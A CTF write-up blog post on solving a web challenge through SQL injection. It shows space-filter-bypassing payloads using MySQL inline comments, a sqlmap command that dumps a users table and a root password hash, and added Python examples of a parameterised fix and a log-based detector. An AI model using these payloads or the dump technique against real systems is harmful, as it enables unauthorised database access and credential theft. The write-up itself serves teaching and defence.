Sunday, August 8, 2010

[smpctf] challenge #12 writeup (web-2)

Last month I had a nice time playing the smpctf CTF; you can view all the writeups here.

After connecting to the web page, we spotted an HTML comment that gave a clue about what was happening :).
So, with this tip, we can infer that the web page expects a parameter called “id”. Let’s give it a try:
http://66.225.157.70:8009/level2/?id=1

The previous request returns a valid message with a username. After that, we started trying different SQL injection vectors, but we were unsuccessful. The good thing is that the different error messages that were shown helped us focus in the right direction.

Finally, we made an interesting finding: the server filtered every space character ‘ ‘ (0x20), so we needed to build an injection without using spaces.

A quick look at an amazing post about evading tricky MySQL filters (here) helped us find the proper MySQL syntax to bypass the server filter.

After some tries, we found a valid injection:
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=1%23/*  => TRUE
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=0%23/*  => FALSE
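The two requests above show why a blacklist on 0x20 is not a fix: the SQL parser accepts an inline comment anywhere it accepts whitespace. The following added example (mine, not part of the original writeup and not the challenge's code) models the handler as I assume it was written, a space check followed by string concatenation, next to the same lookup done with a bound parameter. It uses an in-memory sqlite3 table as a stand-in for the challenge's MySQL `users` table; both engines read `/* */` as a comment, so the space-free payload from the writeup parses the same way. The table rows are the ones from the dump below, and the `#` terminator is left off because sqlite does not use it.

```python
import sqlite3


# Constructed stand-in for the challenge's `users` table (sqlite3, not the
# challenge's MySQL 5.0 server). Rows copied from the dump in the writeup.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (flag TEXT, id INTEGER, name TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            ("iR0ck", 1, "magik", "newPass2"),
            ("HaHa", 2, "redsand", "blaISAGHEYhorse"),
            ("lolFLAGlol", 3, "cookieMonster", "50c43871"),
        ],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Assumed shape of the challenge's handler: reject any value that
    contains 0x20, then paste the value straight into the SQL text."""
    if " " in user_id:
        return None  # the blacklist fires and the request is dropped
    query = f"SELECT name FROM users WHERE id={user_id}"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, user_id):
    """Same lookup with the value validated as an integer and bound as a
    parameter; the value never becomes part of the SQL text, so there is
    nothing for a comment-as-whitespace trick to work on."""
    try:
        numeric_id = int(user_id)
    except ValueError:
        return None  # not an id at all; nothing to look up
    row = conn.execute("SELECT name FROM users WHERE id=?", (numeric_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 or 1=1", "id/**/and/**/1=1", "id/**/and/**/1=0"):
        print(
            f"{value!r:22} vulnerable={lookup_vulnerable(db, value)!r:10} "
            f"hardened={lookup_hardened(db, value)!r}"
        )
```

Run it and the vulnerable handler blocks `1 or 1=1` but answers `id/**/and/**/1=1` with `magik` and `id/**/and/**/1=0` with nothing, which is exactly the TRUE/FALSE oracle the writeup relies on; the hardened handler returns a row only for a real integer id. The `int()` check is defence in depth; the parameter binding alone already removes the injection.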

After that, we used the excellent SQL injection tool sqlmap (thanks Bernardo xD) to obtain a full dump of the database. The only problem is that the tool uses spaces in its SQL queries, so we needed a way to substitute these invalid characters automatically.

Finally, I launched the Burp proxy, which has a cool feature called “match and replace”, so what I did was replace every space with the string /**/ (a MySQL comment). Lazy, but time-efficient ;p.

alex@localhost> python sqlmap.py -u 'http://66.225.157.70:8009/level2/?pass=asdfa&id=id' -p id --proxy=http://192.168.0.2:8080 --postfix='%23' --string=magik --current-db -T users -D level1 --dump

To make the previous command work, we needed to fool sqlmap on the first 3 queries: the tool tests whether the URL is stable (looking for the string ‘magik’), but that string is not returned in the normal response (without injection). So, we changed these queries with Burp so that they returned the expected string, and after that the injection was flawless.
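From the server side, an automated dump driven through a space-rewriting proxy is loud: every request carries inline comments in a query parameter, usually with a `#` terminator, and they arrive by the hundred from one address. The added example below (mine, not from the writeup) shows the check I would run over a web server access log to spot this. The log lines are constructed in common log format; the two injection URLs are the ones from the writeup, while the client addresses, timestamps, the encoded variant and the benign requests are made up for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed common-log-format sample. Lines 2 and 3 carry the writeup's
# injection URLs; line 4 is the same payload fully percent-encoded, as a
# proxy rewrite or a tool might send it. Addresses and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Aug/2010:10:00:01 +0000] "GET /level2/?id=1 HTTP/1.1" 200 512
192.0.2.10 - - [08/Aug/2010:10:00:07 +0000] "GET /level2/?pass=asdfa&id=id/**/and/**/1=1%23/* HTTP/1.1" 200 512
192.0.2.10 - - [08/Aug/2010:10:00:09 +0000] "GET /level2/?pass=asdfa&id=id/**/and/**/1=0%23/* HTTP/1.1" 200 498
192.0.2.10 - - [08/Aug/2010:10:02:11 +0000] "GET /level2/?pass=asdfa&id=id%2F%2A%2A%2Fand%2F%2A%2A%2F1%3D1%23 HTTP/1.1" 200 512
198.51.100.7 - - [08/Aug/2010:10:03:00 +0000] "GET /level2/?id=2 HTTP/1.1" 200 510
198.51.100.7 - - [08/Aug/2010:10:03:30 +0000] "GET /static/style.css HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r"(?P<status>\d{3}) (?P<size>\S+)$"
)

# Things a "no 0x20" blacklist lets through but the SQL parser still reads as
# whitespace or as the start of a comment. All checks run on the decoded value.
CHECKS = (
    ("inline-comment", re.compile(r"/\*.*?\*/", re.S)),
    ("hash-terminator", re.compile(r"#")),
    ("dashdash-terminator", re.compile(r"--(\s|$)")),
    ("unterminated-comment", re.compile(r"/\*(?!.*\*/)", re.S)),
)


def parse_line(line):
    """Split one log line into its fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = urlsplit(rec["target"]).query
    return rec


def inspect_value(value):
    """Names of the checks that fire on one decoded parameter value."""
    return [name for name, rx in CHECKS if rx.search(value)]


def scan_log(text):
    """Flag every query-string parameter whose decoded value trips a check."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        # parse_qsl percent-decodes, so %2F%2A%2A%2F is seen as /**/ as well.
        for param, value in parse_qsl(rec["query"], keep_blank_values=True):
            reasons = inspect_value(value)
            if reasons:
                findings.append(
                    {"src": rec["src"], "ts": rec["ts"], "param": param,
                     "value": value, "reasons": reasons}
                )
    return findings


def sources_over_threshold(findings, threshold=2):
    """Sources with at least `threshold` flagged requests; a tool run produces
    far more than that from a single address."""
    counts = Counter(f["src"] for f in findings)
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["src"], h["ts"], h["param"], repr(h["value"]), ",".join(h["reasons"]))
    print("repeat offenders:", sources_over_threshold(hits))
```

On the sample, the three `id` values from 192.0.2.10 are flagged (inline comment, `#` terminator and, for the raw URLs, the dangling `/*`), the benign `id=1` and `id=2` lookups are not, and the per-source count singles out the one client. Decoding before matching matters: the fourth line never contains a literal `/**/` in the log, so a check on the raw request line would miss it.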

After waiting some minutes we obtained the cookie that allowed us to level up :).
+------------+----+---------------+-----------------+
| flag       | id | name          | pass            |
+------------+----+---------------+-----------------+
| iR0ck      | 1  | magik         | newPass2        |
| HaHa       | 2  | redsand       | blaISAGHEYhorse |
| lolFLAGlol | 3  | cookieMonster | 50c43871        |
+------------+----+---------------+-----------------+


Submitting the flag lolFLAGlol solves this challenge and earns some points :)


As an interesting note, I ran sqlmap to obtain more info about the MySQL server, and this is the info that I obtained. Yep, the database user was DBA, and we obtained a nice hash to crack in our spare time xD.

current database:    'level1'
banner:    '5.0.84'


current user is DBA:    'True'


available databases [3]:
[*] information_schema
[*] level1
[*] mysql


current user:    'root@localhost'


database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'slackware2-web-smp'


database management system users password hashes:
[*] root [1]:
    password hash: *E811D7768F080444F8D9ED913EEC8200FAD3C4FE

Database: level1
Table: users
[3 entries]
+------------+----+---------------+-----------------+
| flag       | id | name          | pass            |
+------------+----+---------------+-----------------+
| iR0ck      | 1  | magik         | newPass2        |
| HaHa       | 2  | redsand       | blaISAGHEYhorse |
| lolFLAGlol | 3  | cookieMonster | 50c43871        |
+------------+----+---------------+-----------------+